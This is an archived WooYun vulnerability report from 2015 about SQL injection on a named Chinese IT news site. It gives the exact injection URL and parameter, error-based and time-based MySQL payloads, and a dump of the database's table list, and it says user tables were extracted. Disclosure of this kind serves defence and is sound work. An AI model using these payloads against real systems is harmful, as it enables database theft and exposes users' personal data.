乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-20: 细节已通知厂商并且等待厂商处理中 2015-07-25: 厂商已经主动忽略漏洞,细节向公众公开
计世网主站存sql注入漏洞
计世网主站存sql注入漏洞,可脱库,可获取所有用户信息
首先是注入点:http://www.ccw.com.cn/space/eyan_more/11550 post:page=2&pagesize=20
Parameter: pagesize (POST) Type: error-based Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: page=2&pagesize=20 PROCEDURE ANALYSE(EXTRACTVALUE(6581,CONCAT(0x5c,0x71626b6a71,(SELECT (CASE WHEN (6581=6581) THEN 1 ELSE 0 END)),0x71786b7171)),1) Type: AND/OR time-based blind Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: page=2&pagesize=20 PROCEDURE ANALYSE(EXTRACTVALUE(8607,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x76445476))))),1)
通过注入可以跑出数据库信息
可查看数据库
跑出itjia库中的124个表
+-----------------------+| appinfo || auth_codes || dalao || ex_applycio || ex_arbor || ex_attachment || ex_bchy || ex_buchonghangye || ex_ca2014 || ex_caexpo || ex_card || ex_card_group || ex_card_ship || ex_cardrefuse_ship || ex_ccw_index_focus || ex_cioforum || ex_cioforum2013 || ex_ciopw || ex_ciopx2012 || ex_ciotp || ex_cisco || ex_citrix || ex_city || ex_collection || ex_collection_group || ex_comment || ex_community || ex_dmf2013 || ex_edm || ex_emc || ex_emc_feedback || ex_emc_user || ex_emcbiao || ex_emcuser || ex_emcverify || ex_event || ex_event_user || ex_eyan || ex_eyanip || ex_haocio_comment || ex_huawei || ex_huaweiuser || ex_ibm || ex_intel || ex_it2013 || ex_itjiaodian4 || ex_jiaodian5 || ex_jiaodian_base || ex_jp || ex_letter_status || ex_live || ex_live_comment || ex_live_content || ex_meeting || ex_meeting_access || ex_meeting_ad || ex_meeting_apply || ex_meeting_comment || ex_meeting_file || ex_meeting_position || ex_meeting_reply || ex_meeting_user || ex_meeting_video || ex_member || ex_message || ex_minisite || ex_noteset || ex_offline_huigu || ex_offline_lianxi || ex_offline_menpiao || ex_offline_news || ex_offline_richeng || ex_offline_zanzhu || ex_offline_zuzhi || ex_online_bmb || ex_online_bmbfield || ex_online_jiabin || ex_online_jiangpin || ex_online_zhuchi || ex_onwall || ex_pro_tag || ex_recommend || ex_release || ex_reply || ex_role || ex_rsa || ex_setting || ex_shouye || ex_shouye2show || ex_snw2014 || ex_snw2014_tech || ex_special || ex_special_comment || ex_special_eyanlist || ex_special_report || ex_subscribe_cio || ex_subscribe_man || ex_subscribe_tag || ex_system_tag || ex_tag || ex_tag_relation || ex_trade || ex_tuwenlive || ex_tvforum || ex_tvrelease || ex_user || ex_user_chengjiu || ex_user_cominfo || ex_user_company || ex_user_education || ex_user_menu || ex_user_privacy || ex_user_profile || ex_user_role || ex_user_role_menu || ex_user_status || ex_user_weibo || ex_video || ex_videointerview_old || ex_weight_tag || ex_yaoqing || ex_ztsafe || tokens || zhongjiang |+-----------------------+
跑了一下ex_user表和ex_member表中的数据
做好过滤
危害等级:无影响厂商忽略
忽略时间:2015-07-25 11:42
漏洞Rank:15 (WooYun评价)
暂无
